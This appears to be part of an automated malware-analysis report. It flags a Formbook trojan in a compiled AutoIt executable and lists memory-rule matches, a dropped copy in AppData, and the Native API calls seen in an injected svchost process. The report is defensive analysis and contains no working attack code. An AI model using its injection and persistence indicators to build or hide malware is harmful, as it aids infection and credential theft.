Source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00D03B4C
Source: N2sgk6jMa2.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: N2sgk6jMa2.exe, 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_24fa4be7-0
Source: N2sgk6jMa2.exe, 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bde823c0-a
Source: N2sgk6jMa2.exe, 00000000.00000003.1785119147.0000000001CD5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3c347690-4
Source: N2sgk6jMa2.exe, 00000000.00000003.1785119147.0000000001CD5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1e650660-f
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00B33B4C
Source: .exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: .exe, 00000001.00000000.1785473589.0000000000BE5000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_523d2ff7-e
Source: .exe, 00000001.00000000.1785473589.0000000000BE5000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_66872f27-5
Source: N2sgk6jMa2.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6977c347-b
Source: N2sgk6jMa2.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9ff907fe-e
Source: .exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_480c1db6-a
Source: .exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b3f590af-f

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D640B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00D640B1

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D58858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00D58858

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D6545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00D6545F
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B9545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		1_2_00B9545F

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D0E800	0_2_00D0E800
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2DBB5	0_2_00D2DBB5
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D8804A	0_2_00D8804A
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D0E060	0_2_00D0E060
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D14140	0_2_00D14140
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D22405	0_2_00D22405
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D36522	0_2_00D36522
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D3267E	0_2_00D3267E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D80665	0_2_00D80665
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D16843	0_2_00D16843
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2283A	0_2_00D2283A
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D389DF	0_2_00D389DF
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D80AE2	0_2_00D80AE2
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D36A94	0_2_00D36A94
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D18A0E	0_2_00D18A0E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D68B13	0_2_00D68B13
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D5EB07	0_2_00D5EB07
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2CD61	0_2_00D2CD61
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D37006	0_2_00D37006
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D13190	0_2_00D13190
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D1710E	0_2_00D1710E
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D01287	0_2_00D01287
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D233C7	0_2_00D233C7
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2F419	0_2_00D2F419
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D216C4	0_2_00D216C4
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D15680	0_2_00D15680
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D278D3	0_2_00D278D3
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D158C0	0_2_00D158C0
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D21BB8	0_2_00D21BB8
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D39D05	0_2_00D39D05
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D0FE40	0_2_00D0FE40
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D21FD0	0_2_00D21FD0
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2BFE6	0_2_00D2BFE6
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00B43610	0_2_00B43610
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B3E800	1_2_00B3E800
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5DBB5	1_2_00B5DBB5
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B3E060	1_2_00B3E060
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BB804A	1_2_00BB804A
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B44140	1_2_00B44140
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B52405	1_2_00B52405
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B66522	1_2_00B66522
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B6267E	1_2_00B6267E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BB0665	1_2_00BB0665
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5283A	1_2_00B5283A
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B46843	1_2_00B46843
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B689DF	1_2_00B689DF
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B66A94	1_2_00B66A94
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BB0AE2	1_2_00BB0AE2
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B48A0E	1_2_00B48A0E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B98B13	1_2_00B98B13
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B8EB07	1_2_00B8EB07
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5CD61	1_2_00B5CD61
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B67006	1_2_00B67006
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B43190	1_2_00B43190
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B4710E	1_2_00B4710E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B31287	1_2_00B31287
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B533C7	1_2_00B533C7
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5F419	1_2_00B5F419
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B45680	1_2_00B45680
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B516C4	1_2_00B516C4
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B578D3	1_2_00B578D3
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B458C0	1_2_00B458C0
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B51BB8	1_2_00B51BB8
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B69D05	1_2_00B69D05
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B3FE40	1_2_00B3FE40
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5BFE6	1_2_00B5BFE6
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B51FD0	1_2_00B51FD0
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_020C3610	1_2_020C3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F41A2	2_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345D2F0	2_2_0345D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485630	2_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035095C3	2_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD2	2_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD5	2_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2

Source: C:\Users\user\AppData\Local\directory\.exe	Code function: String function: 00B50D27 appears 70 times
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: String function: 00B37F41 appears 35 times
